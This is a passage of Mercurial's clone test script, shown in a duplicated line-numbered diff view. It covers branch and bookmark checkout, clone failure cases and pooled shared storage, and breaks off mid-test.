160 Invalid dest '' with --pull must abort (issue2528):
161
161
162 $ hg clone --pull a ''
162 $ hg clone --pull a ''
163 abort: empty destination path is not valid
163 abort: empty destination path is not valid
164 [255]
164 [255]
165
165
166 Clone to '.':
166 Clone to '.':
167
167
168 $ mkdir h
168 $ mkdir h
169 $ cd h
169 $ cd h
170 $ hg clone ../a .
170 $ hg clone ../a .
171 updating to branch default
171 updating to branch default
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
173 $ cd ..
173 $ cd ..
174
174
175
175
176 *** Tests for option -u ***
176 *** Tests for option -u ***
177
177
178 Adding some more history to repo a:
178 Adding some more history to repo a:
179
179
180 $ cd a
180 $ cd a
181 $ hg tag ref1
181 $ hg tag ref1
182 $ echo the quick brown fox >a
182 $ echo the quick brown fox >a
183 $ hg ci -m "hacked default"
183 $ hg ci -m "hacked default"
184 $ hg up ref1
184 $ hg up ref1
185 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
185 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
186 $ hg branch stable
186 $ hg branch stable
187 marked working directory as branch stable
187 marked working directory as branch stable
188 (branches are permanent and global, did you want a bookmark?)
188 (branches are permanent and global, did you want a bookmark?)
189 $ echo some text >a
189 $ echo some text >a
190 $ hg ci -m "starting branch stable"
190 $ hg ci -m "starting branch stable"
191 $ hg tag ref2
191 $ hg tag ref2
192 $ echo some more text >a
192 $ echo some more text >a
193 $ hg ci -m "another change for branch stable"
193 $ hg ci -m "another change for branch stable"
194 $ hg up ref2
194 $ hg up ref2
195 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
195 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
196 $ hg parents
196 $ hg parents
197 changeset: 13:e8ece76546a6
197 changeset: 13:e8ece76546a6
198 branch: stable
198 branch: stable
199 tag: ref2
199 tag: ref2
200 parent: 10:a7949464abda
200 parent: 10:a7949464abda
201 user: test
201 user: test
202 date: Thu Jan 01 00:00:00 1970 +0000
202 date: Thu Jan 01 00:00:00 1970 +0000
203 summary: starting branch stable
203 summary: starting branch stable
204
204
205
205
206 Repo a has two heads:
206 Repo a has two heads:
207
207
208 $ hg heads
208 $ hg heads
209 changeset: 15:0aae7cf88f0d
209 changeset: 15:0aae7cf88f0d
210 branch: stable
210 branch: stable
211 tag: tip
211 tag: tip
212 user: test
212 user: test
213 date: Thu Jan 01 00:00:00 1970 +0000
213 date: Thu Jan 01 00:00:00 1970 +0000
214 summary: another change for branch stable
214 summary: another change for branch stable
215
215
216 changeset: 12:f21241060d6a
216 changeset: 12:f21241060d6a
217 user: test
217 user: test
218 date: Thu Jan 01 00:00:00 1970 +0000
218 date: Thu Jan 01 00:00:00 1970 +0000
219 summary: hacked default
219 summary: hacked default
220
220
221
221
222 $ cd ..
222 $ cd ..
223
223
224
224
225 Testing --noupdate with --updaterev (must abort):
225 Testing --noupdate with --updaterev (must abort):
226
226
227 $ hg clone --noupdate --updaterev 1 a ua
227 $ hg clone --noupdate --updaterev 1 a ua
228 abort: cannot specify both --noupdate and --updaterev
228 abort: cannot specify both --noupdate and --updaterev
229 [255]
229 [255]
230
230
231
231
232 Testing clone -u:
232 Testing clone -u:
233
233
234 $ hg clone -u . a ua
234 $ hg clone -u . a ua
235 updating to branch stable
235 updating to branch stable
236 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
236 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
237
237
238 Repo ua has both heads:
238 Repo ua has both heads:
239
239
240 $ hg -R ua heads
240 $ hg -R ua heads
241 changeset: 15:0aae7cf88f0d
241 changeset: 15:0aae7cf88f0d
242 branch: stable
242 branch: stable
243 tag: tip
243 tag: tip
244 user: test
244 user: test
245 date: Thu Jan 01 00:00:00 1970 +0000
245 date: Thu Jan 01 00:00:00 1970 +0000
246 summary: another change for branch stable
246 summary: another change for branch stable
247
247
248 changeset: 12:f21241060d6a
248 changeset: 12:f21241060d6a
249 user: test
249 user: test
250 date: Thu Jan 01 00:00:00 1970 +0000
250 date: Thu Jan 01 00:00:00 1970 +0000
251 summary: hacked default
251 summary: hacked default
252
252
253
253
254 Same revision checked out in repo a and ua:
254 Same revision checked out in repo a and ua:
255
255
256 $ hg -R a parents --template "{node|short}\n"
256 $ hg -R a parents --template "{node|short}\n"
257 e8ece76546a6
257 e8ece76546a6
258 $ hg -R ua parents --template "{node|short}\n"
258 $ hg -R ua parents --template "{node|short}\n"
259 e8ece76546a6
259 e8ece76546a6
260
260
261 $ rm -r ua
261 $ rm -r ua
262
262
263
263
264 Testing clone --pull -u:
264 Testing clone --pull -u:
265
265
266 $ hg clone --pull -u . a ua
266 $ hg clone --pull -u . a ua
267 requesting all changes
267 requesting all changes
268 adding changesets
268 adding changesets
269 adding manifests
269 adding manifests
270 adding file changes
270 adding file changes
271 added 16 changesets with 16 changes to 3 files (+1 heads)
271 added 16 changesets with 16 changes to 3 files (+1 heads)
272 updating to branch stable
272 updating to branch stable
273 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
273 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
274
274
275 Repo ua has both heads:
275 Repo ua has both heads:
276
276
277 $ hg -R ua heads
277 $ hg -R ua heads
278 changeset: 15:0aae7cf88f0d
278 changeset: 15:0aae7cf88f0d
279 branch: stable
279 branch: stable
280 tag: tip
280 tag: tip
281 user: test
281 user: test
282 date: Thu Jan 01 00:00:00 1970 +0000
282 date: Thu Jan 01 00:00:00 1970 +0000
283 summary: another change for branch stable
283 summary: another change for branch stable
284
284
285 changeset: 12:f21241060d6a
285 changeset: 12:f21241060d6a
286 user: test
286 user: test
287 date: Thu Jan 01 00:00:00 1970 +0000
287 date: Thu Jan 01 00:00:00 1970 +0000
288 summary: hacked default
288 summary: hacked default
289
289
290
290
291 Same revision checked out in repo a and ua:
291 Same revision checked out in repo a and ua:
292
292
293 $ hg -R a parents --template "{node|short}\n"
293 $ hg -R a parents --template "{node|short}\n"
294 e8ece76546a6
294 e8ece76546a6
295 $ hg -R ua parents --template "{node|short}\n"
295 $ hg -R ua parents --template "{node|short}\n"
296 e8ece76546a6
296 e8ece76546a6
297
297
298 $ rm -r ua
298 $ rm -r ua
299
299
300
300
301 Testing clone -u <branch>:
301 Testing clone -u <branch>:
302
302
303 $ hg clone -u stable a ua
303 $ hg clone -u stable a ua
304 updating to branch stable
304 updating to branch stable
305 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
305 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
306
306
307 Repo ua has both heads:
307 Repo ua has both heads:
308
308
309 $ hg -R ua heads
309 $ hg -R ua heads
310 changeset: 15:0aae7cf88f0d
310 changeset: 15:0aae7cf88f0d
311 branch: stable
311 branch: stable
312 tag: tip
312 tag: tip
313 user: test
313 user: test
314 date: Thu Jan 01 00:00:00 1970 +0000
314 date: Thu Jan 01 00:00:00 1970 +0000
315 summary: another change for branch stable
315 summary: another change for branch stable
316
316
317 changeset: 12:f21241060d6a
317 changeset: 12:f21241060d6a
318 user: test
318 user: test
319 date: Thu Jan 01 00:00:00 1970 +0000
319 date: Thu Jan 01 00:00:00 1970 +0000
320 summary: hacked default
320 summary: hacked default
321
321
322
322
323 Branch 'stable' is checked out:
323 Branch 'stable' is checked out:
324
324
325 $ hg -R ua parents
325 $ hg -R ua parents
326 changeset: 15:0aae7cf88f0d
326 changeset: 15:0aae7cf88f0d
327 branch: stable
327 branch: stable
328 tag: tip
328 tag: tip
329 user: test
329 user: test
330 date: Thu Jan 01 00:00:00 1970 +0000
330 date: Thu Jan 01 00:00:00 1970 +0000
331 summary: another change for branch stable
331 summary: another change for branch stable
332
332
333
333
334 $ rm -r ua
334 $ rm -r ua
335
335
336
336
337 Testing default checkout:
337 Testing default checkout:
338
338
339 $ hg clone a ua
339 $ hg clone a ua
340 updating to branch default
340 updating to branch default
341 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
341 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
342
342
343 Repo ua has both heads:
343 Repo ua has both heads:
344
344
345 $ hg -R ua heads
345 $ hg -R ua heads
346 changeset: 15:0aae7cf88f0d
346 changeset: 15:0aae7cf88f0d
347 branch: stable
347 branch: stable
348 tag: tip
348 tag: tip
349 user: test
349 user: test
350 date: Thu Jan 01 00:00:00 1970 +0000
350 date: Thu Jan 01 00:00:00 1970 +0000
351 summary: another change for branch stable
351 summary: another change for branch stable
352
352
353 changeset: 12:f21241060d6a
353 changeset: 12:f21241060d6a
354 user: test
354 user: test
355 date: Thu Jan 01 00:00:00 1970 +0000
355 date: Thu Jan 01 00:00:00 1970 +0000
356 summary: hacked default
356 summary: hacked default
357
357
358
358
359 Branch 'default' is checked out:
359 Branch 'default' is checked out:
360
360
361 $ hg -R ua parents
361 $ hg -R ua parents
362 changeset: 12:f21241060d6a
362 changeset: 12:f21241060d6a
363 user: test
363 user: test
364 date: Thu Jan 01 00:00:00 1970 +0000
364 date: Thu Jan 01 00:00:00 1970 +0000
365 summary: hacked default
365 summary: hacked default
366
366
367 Test clone with a branch named "@" (issue3677)
367 Test clone with a branch named "@" (issue3677)
368
368
369 $ hg -R ua branch @
369 $ hg -R ua branch @
370 marked working directory as branch @
370 marked working directory as branch @
371 $ hg -R ua commit -m 'created branch @'
371 $ hg -R ua commit -m 'created branch @'
372 $ hg clone ua atbranch
372 $ hg clone ua atbranch
373 updating to branch default
373 updating to branch default
374 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
374 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
375 $ hg -R atbranch heads
375 $ hg -R atbranch heads
376 changeset: 16:798b6d97153e
376 changeset: 16:798b6d97153e
377 branch: @
377 branch: @
378 tag: tip
378 tag: tip
379 parent: 12:f21241060d6a
379 parent: 12:f21241060d6a
380 user: test
380 user: test
381 date: Thu Jan 01 00:00:00 1970 +0000
381 date: Thu Jan 01 00:00:00 1970 +0000
382 summary: created branch @
382 summary: created branch @
383
383
384 changeset: 15:0aae7cf88f0d
384 changeset: 15:0aae7cf88f0d
385 branch: stable
385 branch: stable
386 user: test
386 user: test
387 date: Thu Jan 01 00:00:00 1970 +0000
387 date: Thu Jan 01 00:00:00 1970 +0000
388 summary: another change for branch stable
388 summary: another change for branch stable
389
389
390 changeset: 12:f21241060d6a
390 changeset: 12:f21241060d6a
391 user: test
391 user: test
392 date: Thu Jan 01 00:00:00 1970 +0000
392 date: Thu Jan 01 00:00:00 1970 +0000
393 summary: hacked default
393 summary: hacked default
394
394
395 $ hg -R atbranch parents
395 $ hg -R atbranch parents
396 changeset: 12:f21241060d6a
396 changeset: 12:f21241060d6a
397 user: test
397 user: test
398 date: Thu Jan 01 00:00:00 1970 +0000
398 date: Thu Jan 01 00:00:00 1970 +0000
399 summary: hacked default
399 summary: hacked default
400
400
401
401
402 $ rm -r ua atbranch
402 $ rm -r ua atbranch
403
403
404
404
405 Testing #<branch>:
405 Testing #<branch>:
406
406
407 $ hg clone -u . a#stable ua
407 $ hg clone -u . a#stable ua
408 adding changesets
408 adding changesets
409 adding manifests
409 adding manifests
410 adding file changes
410 adding file changes
411 added 14 changesets with 14 changes to 3 files
411 added 14 changesets with 14 changes to 3 files
412 updating to branch stable
412 updating to branch stable
413 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
413 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
414
414
415 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
415 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
416
416
417 $ hg -R ua heads
417 $ hg -R ua heads
418 changeset: 13:0aae7cf88f0d
418 changeset: 13:0aae7cf88f0d
419 branch: stable
419 branch: stable
420 tag: tip
420 tag: tip
421 user: test
421 user: test
422 date: Thu Jan 01 00:00:00 1970 +0000
422 date: Thu Jan 01 00:00:00 1970 +0000
423 summary: another change for branch stable
423 summary: another change for branch stable
424
424
425 changeset: 10:a7949464abda
425 changeset: 10:a7949464abda
426 user: test
426 user: test
427 date: Thu Jan 01 00:00:00 1970 +0000
427 date: Thu Jan 01 00:00:00 1970 +0000
428 summary: test
428 summary: test
429
429
430
430
431 Same revision checked out in repo a and ua:
431 Same revision checked out in repo a and ua:
432
432
433 $ hg -R a parents --template "{node|short}\n"
433 $ hg -R a parents --template "{node|short}\n"
434 e8ece76546a6
434 e8ece76546a6
435 $ hg -R ua parents --template "{node|short}\n"
435 $ hg -R ua parents --template "{node|short}\n"
436 e8ece76546a6
436 e8ece76546a6
437
437
438 $ rm -r ua
438 $ rm -r ua
439
439
440
440
441 Testing -u -r <branch>:
441 Testing -u -r <branch>:
442
442
443 $ hg clone -u . -r stable a ua
443 $ hg clone -u . -r stable a ua
444 adding changesets
444 adding changesets
445 adding manifests
445 adding manifests
446 adding file changes
446 adding file changes
447 added 14 changesets with 14 changes to 3 files
447 added 14 changesets with 14 changes to 3 files
448 updating to branch stable
448 updating to branch stable
449 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
449 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
450
450
451 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
451 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
452
452
453 $ hg -R ua heads
453 $ hg -R ua heads
454 changeset: 13:0aae7cf88f0d
454 changeset: 13:0aae7cf88f0d
455 branch: stable
455 branch: stable
456 tag: tip
456 tag: tip
457 user: test
457 user: test
458 date: Thu Jan 01 00:00:00 1970 +0000
458 date: Thu Jan 01 00:00:00 1970 +0000
459 summary: another change for branch stable
459 summary: another change for branch stable
460
460
461 changeset: 10:a7949464abda
461 changeset: 10:a7949464abda
462 user: test
462 user: test
463 date: Thu Jan 01 00:00:00 1970 +0000
463 date: Thu Jan 01 00:00:00 1970 +0000
464 summary: test
464 summary: test
465
465
466
466
467 Same revision checked out in repo a and ua:
467 Same revision checked out in repo a and ua:
468
468
469 $ hg -R a parents --template "{node|short}\n"
469 $ hg -R a parents --template "{node|short}\n"
470 e8ece76546a6
470 e8ece76546a6
471 $ hg -R ua parents --template "{node|short}\n"
471 $ hg -R ua parents --template "{node|short}\n"
472 e8ece76546a6
472 e8ece76546a6
473
473
474 $ rm -r ua
474 $ rm -r ua
475
475
476
476
477 Testing -r <branch>:
477 Testing -r <branch>:
478
478
479 $ hg clone -r stable a ua
479 $ hg clone -r stable a ua
480 adding changesets
480 adding changesets
481 adding manifests
481 adding manifests
482 adding file changes
482 adding file changes
483 added 14 changesets with 14 changes to 3 files
483 added 14 changesets with 14 changes to 3 files
484 updating to branch stable
484 updating to branch stable
485 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
485 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
486
486
487 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
487 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
488
488
489 $ hg -R ua heads
489 $ hg -R ua heads
490 changeset: 13:0aae7cf88f0d
490 changeset: 13:0aae7cf88f0d
491 branch: stable
491 branch: stable
492 tag: tip
492 tag: tip
493 user: test
493 user: test
494 date: Thu Jan 01 00:00:00 1970 +0000
494 date: Thu Jan 01 00:00:00 1970 +0000
495 summary: another change for branch stable
495 summary: another change for branch stable
496
496
497 changeset: 10:a7949464abda
497 changeset: 10:a7949464abda
498 user: test
498 user: test
499 date: Thu Jan 01 00:00:00 1970 +0000
499 date: Thu Jan 01 00:00:00 1970 +0000
500 summary: test
500 summary: test
501
501
502
502
503 Branch 'stable' is checked out:
503 Branch 'stable' is checked out:
504
504
505 $ hg -R ua parents
505 $ hg -R ua parents
506 changeset: 13:0aae7cf88f0d
506 changeset: 13:0aae7cf88f0d
507 branch: stable
507 branch: stable
508 tag: tip
508 tag: tip
509 user: test
509 user: test
510 date: Thu Jan 01 00:00:00 1970 +0000
510 date: Thu Jan 01 00:00:00 1970 +0000
511 summary: another change for branch stable
511 summary: another change for branch stable
512
512
513
513
514 $ rm -r ua
514 $ rm -r ua
515
515
516
516
517 Issue2267: Error in 1.6 hg.py: TypeError: 'NoneType' object is not
517 Issue2267: Error in 1.6 hg.py: TypeError: 'NoneType' object is not
518 iterable in addbranchrevs()
518 iterable in addbranchrevs()
519
519
520 $ cat <<EOF > simpleclone.py
520 $ cat <<EOF > simpleclone.py
521 > from mercurial import ui, hg
521 > from mercurial import ui, hg
522 > myui = ui.ui.load()
522 > myui = ui.ui.load()
523 > repo = hg.repository(myui, 'a')
523 > repo = hg.repository(myui, 'a')
524 > hg.clone(myui, {}, repo, dest="ua")
524 > hg.clone(myui, {}, repo, dest="ua")
525 > EOF
525 > EOF
526
526
527 $ $PYTHON simpleclone.py
527 $ $PYTHON simpleclone.py
528 updating to branch default
528 updating to branch default
529 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
529 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
530
530
531 $ rm -r ua
531 $ rm -r ua
532
532
533 $ cat <<EOF > branchclone.py
533 $ cat <<EOF > branchclone.py
534 > from mercurial import ui, hg, extensions
534 > from mercurial import ui, hg, extensions
535 > myui = ui.ui.load()
535 > myui = ui.ui.load()
536 > extensions.loadall(myui)
536 > extensions.loadall(myui)
537 > repo = hg.repository(myui, 'a')
537 > repo = hg.repository(myui, 'a')
538 > hg.clone(myui, {}, repo, dest="ua", branch=["stable",])
538 > hg.clone(myui, {}, repo, dest="ua", branch=["stable",])
539 > EOF
539 > EOF
540
540
541 $ $PYTHON branchclone.py
541 $ $PYTHON branchclone.py
542 adding changesets
542 adding changesets
543 adding manifests
543 adding manifests
544 adding file changes
544 adding file changes
545 added 14 changesets with 14 changes to 3 files
545 added 14 changesets with 14 changes to 3 files
546 updating to branch stable
546 updating to branch stable
547 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
547 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
548 $ rm -r ua
548 $ rm -r ua
549
549
550
550
551 Test clone with special '@' bookmark:
551 Test clone with special '@' bookmark:
552 $ cd a
552 $ cd a
553 $ hg bookmark -r a7949464abda @ # branch point of stable from default
553 $ hg bookmark -r a7949464abda @ # branch point of stable from default
554 $ hg clone . ../i
554 $ hg clone . ../i
555 updating to bookmark @
555 updating to bookmark @
556 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
556 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
557 $ hg id -i ../i
557 $ hg id -i ../i
558 a7949464abda
558 a7949464abda
559 $ rm -r ../i
559 $ rm -r ../i
560
560
561 $ hg bookmark -f -r stable @
561 $ hg bookmark -f -r stable @
562 $ hg bookmarks
562 $ hg bookmarks
563 @ 15:0aae7cf88f0d
563 @ 15:0aae7cf88f0d
564 $ hg clone . ../i
564 $ hg clone . ../i
565 updating to bookmark @ on branch stable
565 updating to bookmark @ on branch stable
566 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
566 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
567 $ hg id -i ../i
567 $ hg id -i ../i
568 0aae7cf88f0d
568 0aae7cf88f0d
569 $ cd "$TESTTMP"
569 $ cd "$TESTTMP"
570
570
571
571
572 Testing failures:
572 Testing failures:
573
573
574 $ mkdir fail
574 $ mkdir fail
575 $ cd fail
575 $ cd fail
576
576
577 No local source
577 No local source
578
578
579 $ hg clone a b
579 $ hg clone a b
580 abort: repository a not found!
580 abort: repository a not found!
581 [255]
581 [255]
582
582
583 No remote source
583 No remote source
584
584
585 #if windows
585 #if windows
586 $ hg clone http://$LOCALIP:3121/a b
586 $ hg clone http://$LOCALIP:3121/a b
587 abort: error: * (glob)
587 abort: error: * (glob)
588 [255]
588 [255]
589 #else
589 #else
590 $ hg clone http://$LOCALIP:3121/a b
590 $ hg clone http://$LOCALIP:3121/a b
591 abort: error: *refused* (glob)
591 abort: error: *refused* (glob)
592 [255]
592 [255]
593 #endif
593 #endif
594 $ rm -rf b # work around bug with http clone
594 $ rm -rf b # work around bug with http clone
595
595
596
596
597 #if unix-permissions no-root
597 #if unix-permissions no-root
598
598
599 Inaccessible source
599 Inaccessible source
600
600
601 $ mkdir a
601 $ mkdir a
602 $ chmod 000 a
602 $ chmod 000 a
603 $ hg clone a b
603 $ hg clone a b
604 abort: repository a not found!
604 abort: repository a not found!
605 [255]
605 [255]
606
606
607 Inaccessible destination
607 Inaccessible destination
608
608
609 $ hg init b
609 $ hg init b
610 $ cd b
610 $ cd b
611 $ hg clone . ../a
611 $ hg clone . ../a
612 abort: Permission denied: '../a'
612 abort: Permission denied: '../a'
613 [255]
613 [255]
614 $ cd ..
614 $ cd ..
615 $ chmod 700 a
615 $ chmod 700 a
616 $ rm -r a b
616 $ rm -r a b
617
617
618 #endif
618 #endif
619
619
620
620
621 #if fifo
621 #if fifo
622
622
623 Source of wrong type
623 Source of wrong type
624
624
625 $ mkfifo a
625 $ mkfifo a
626 $ hg clone a b
626 $ hg clone a b
627 abort: repository a not found!
627 abort: repository a not found!
628 [255]
628 [255]
629 $ rm a
629 $ rm a
630
630
631 #endif
631 #endif
632
632
633 Default destination, same directory
633 Default destination, same directory
634
634
635 $ hg init q
635 $ hg init q
636 $ hg clone q
636 $ hg clone q
637 destination directory: q
637 destination directory: q
638 abort: destination 'q' is not empty
638 abort: destination 'q' is not empty
639 [255]
639 [255]
640
640
641 destination directory not empty
641 destination directory not empty
642
642
643 $ mkdir a
643 $ mkdir a
644 $ echo stuff > a/a
644 $ echo stuff > a/a
645 $ hg clone q a
645 $ hg clone q a
646 abort: destination 'a' is not empty
646 abort: destination 'a' is not empty
647 [255]
647 [255]
648
648
649
649
650 #if unix-permissions no-root
650 #if unix-permissions no-root
651
651
652 leave existing directory in place after clone failure
652 leave existing directory in place after clone failure
653
653
654 $ hg init c
654 $ hg init c
655 $ cd c
655 $ cd c
656 $ echo c > c
656 $ echo c > c
657 $ hg commit -A -m test
657 $ hg commit -A -m test
658 adding c
658 adding c
659 $ chmod -rx .hg/store/data
659 $ chmod -rx .hg/store/data
660 $ cd ..
660 $ cd ..
661 $ mkdir d
661 $ mkdir d
662 $ hg clone c d 2> err
662 $ hg clone c d 2> err
663 [255]
663 [255]
664 $ test -d d
664 $ test -d d
665 $ test -d d/.hg
665 $ test -d d/.hg
666 [1]
666 [1]
667
667
668 re-enable perm to allow deletion
668 re-enable perm to allow deletion
669
669
670 $ chmod +rx c/.hg/store/data
670 $ chmod +rx c/.hg/store/data
671
671
672 #endif
672 #endif
673
673
674 $ cd ..
674 $ cd ..
675
675
676 Test clone from the repository in (emulated) revlog format 0 (issue4203):
676 Test clone from the repository in (emulated) revlog format 0 (issue4203):
677
677
678 $ mkdir issue4203
678 $ mkdir issue4203
679 $ mkdir -p src/.hg
679 $ mkdir -p src/.hg
680 $ echo foo > src/foo
680 $ echo foo > src/foo
681 $ hg -R src add src/foo
681 $ hg -R src add src/foo
682 $ hg -R src commit -m '#0'
682 $ hg -R src commit -m '#0'
683 $ hg -R src log -q
683 $ hg -R src log -q
684 0:e1bab28bca43
684 0:e1bab28bca43
685 $ hg clone -U -q src dst
685 $ hg clone -U -q src dst
686 $ hg -R dst log -q
686 $ hg -R dst log -q
687 0:e1bab28bca43
687 0:e1bab28bca43
688
688
689 Create repositories to test auto sharing functionality
689 Create repositories to test auto sharing functionality
690
690
691 $ cat >> $HGRCPATH << EOF
691 $ cat >> $HGRCPATH << EOF
692 > [extensions]
692 > [extensions]
693 > share=
693 > share=
694 > EOF
694 > EOF
695
695
696 $ hg init empty
696 $ hg init empty
697 $ hg init source1a
697 $ hg init source1a
698 $ cd source1a
698 $ cd source1a
699 $ echo initial1 > foo
699 $ echo initial1 > foo
700 $ hg -q commit -A -m initial
700 $ hg -q commit -A -m initial
701 $ echo second > foo
701 $ echo second > foo
702 $ hg commit -m second
702 $ hg commit -m second
703 $ cd ..
703 $ cd ..
704
704
705 $ hg init filteredrev0
705 $ hg init filteredrev0
706 $ cd filteredrev0
706 $ cd filteredrev0
707 $ cat >> .hg/hgrc << EOF
707 $ cat >> .hg/hgrc << EOF
708 > [experimental]
708 > [experimental]
709 > evolution=createmarkers
709 > evolution=createmarkers
710 > EOF
710 > EOF
711 $ echo initial1 > foo
711 $ echo initial1 > foo
712 $ hg -q commit -A -m initial0
712 $ hg -q commit -A -m initial0
713 $ hg -q up -r null
713 $ hg -q up -r null
714 $ echo initial2 > foo
714 $ echo initial2 > foo
715 $ hg -q commit -A -m initial1
715 $ hg -q commit -A -m initial1
716 $ hg debugobsolete c05d5c47a5cf81401869999f3d05f7d699d2b29a e082c1832e09a7d1e78b7fd49a592d372de854c8
716 $ hg debugobsolete c05d5c47a5cf81401869999f3d05f7d699d2b29a e082c1832e09a7d1e78b7fd49a592d372de854c8
717 obsoleted 1 changesets
717 obsoleted 1 changesets
718 $ cd ..
718 $ cd ..
719
719
720 $ hg -q clone --pull source1a source1b
720 $ hg -q clone --pull source1a source1b
721 $ cd source1a
721 $ cd source1a
722 $ hg bookmark bookA
722 $ hg bookmark bookA
723 $ echo 1a > foo
723 $ echo 1a > foo
724 $ hg commit -m 1a
724 $ hg commit -m 1a
725 $ cd ../source1b
725 $ cd ../source1b
726 $ hg -q up -r 0
726 $ hg -q up -r 0
727 $ echo head1 > foo
727 $ echo head1 > foo
728 $ hg commit -m head1
728 $ hg commit -m head1
729 created new head
729 created new head
730 $ hg bookmark head1
730 $ hg bookmark head1
731 $ hg -q up -r 0
731 $ hg -q up -r 0
732 $ echo head2 > foo
732 $ echo head2 > foo
733 $ hg commit -m head2
733 $ hg commit -m head2
734 created new head
734 created new head
735 $ hg bookmark head2
735 $ hg bookmark head2
736 $ hg -q up -r 0
736 $ hg -q up -r 0
737 $ hg branch branch1
737 $ hg branch branch1
738 marked working directory as branch branch1
738 marked working directory as branch branch1
739 (branches are permanent and global, did you want a bookmark?)
739 (branches are permanent and global, did you want a bookmark?)
740 $ echo branch1 > foo
740 $ echo branch1 > foo
741 $ hg commit -m branch1
741 $ hg commit -m branch1
742 $ hg -q up -r 0
742 $ hg -q up -r 0
743 $ hg branch branch2
743 $ hg branch branch2
744 marked working directory as branch branch2
744 marked working directory as branch branch2
745 $ echo branch2 > foo
745 $ echo branch2 > foo
746 $ hg commit -m branch2
746 $ hg commit -m branch2
747 $ cd ..
747 $ cd ..
748 $ hg init source2
748 $ hg init source2
749 $ cd source2
749 $ cd source2
750 $ echo initial2 > foo
750 $ echo initial2 > foo
751 $ hg -q commit -A -m initial2
751 $ hg -q commit -A -m initial2
752 $ echo second > foo
752 $ echo second > foo
753 $ hg commit -m second
753 $ hg commit -m second
754 $ cd ..
754 $ cd ..
755
755
756 Clone with auto share from an empty repo should not result in share
756 Clone with auto share from an empty repo should not result in share
757
757
758 $ mkdir share
758 $ mkdir share
759 $ hg --config share.pool=share clone empty share-empty
759 $ hg --config share.pool=share clone empty share-empty
760 (not using pooled storage: remote appears to be empty)
760 (not using pooled storage: remote appears to be empty)
761 updating to branch default
761 updating to branch default
762 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
762 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
763 $ ls share
763 $ ls share
764 $ test -d share-empty/.hg/store
764 $ test -d share-empty/.hg/store
765 $ test -f share-empty/.hg/sharedpath
765 $ test -f share-empty/.hg/sharedpath
766 [1]
766 [1]
767
767
768 Clone with auto share from a repo with filtered revision 0 should not result in share
768 Clone with auto share from a repo with filtered revision 0 should not result in share
769
769
770 $ hg --config share.pool=share clone filteredrev0 share-filtered
770 $ hg --config share.pool=share clone filteredrev0 share-filtered
771 (not using pooled storage: unable to resolve identity of remote)
771 (not using pooled storage: unable to resolve identity of remote)
772 requesting all changes
772 requesting all changes
773 adding changesets
773 adding changesets
774 adding manifests
774 adding manifests
775 adding file changes
775 adding file changes
776 added 1 changesets with 1 changes to 1 files
776 added 1 changesets with 1 changes to 1 files
777 updating to branch default
777 updating to branch default
778 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
778 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
779
779
780 Clone from repo with content should result in shared store being created
780 Clone from repo with content should result in shared store being created
781
781
782 $ hg --config share.pool=share clone source1a share-dest1a
782 $ hg --config share.pool=share clone source1a share-dest1a
783 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
783 (sharing from new pooled repository b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1)
784 requesting all changes
784 requesting all changes
785 adding changesets
785 adding changesets
786 adding manifests
786 adding manifests
787 adding file changes
787 adding file changes
788 added 3 changesets with 3 changes to 1 files
788 added 3 changesets with 3 changes to 1 files
789 searching for changes
789 searching for changes
790 no changes found
790 no changes found
791 adding remote bookmark bookA
791 adding remote bookmark bookA
792 updating working directory
792 updating working directory
793 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
793 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
794
794
795 The shared repo should have been created
795 The shared repo should have been created
796
796
797 $ ls share
797 $ ls share
798 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
798 b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1
799
799
800 The destination should point to it
800 The destination should point to it
801
801
802 $ cat share-dest1a/.hg/sharedpath; echo
802 $ cat share-dest1a/.hg/sharedpath; echo
803 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
803 $TESTTMP/share/b5f04eac9d8f7a6a9fcb070243cccea7dc5ea0c1/.hg (glob)
804
804
805 The destination should have bookmarks
805 The destination should have bookmarks
806
806
807 $ hg -R share-dest1a bookmarks
807 $ hg -R share-dest1a bookmarks
808 bookA 2:e5bfe23c0b47
808 bookA 2:e5bfe23c0b47
809
809
810 The default path should be the remote, not the share
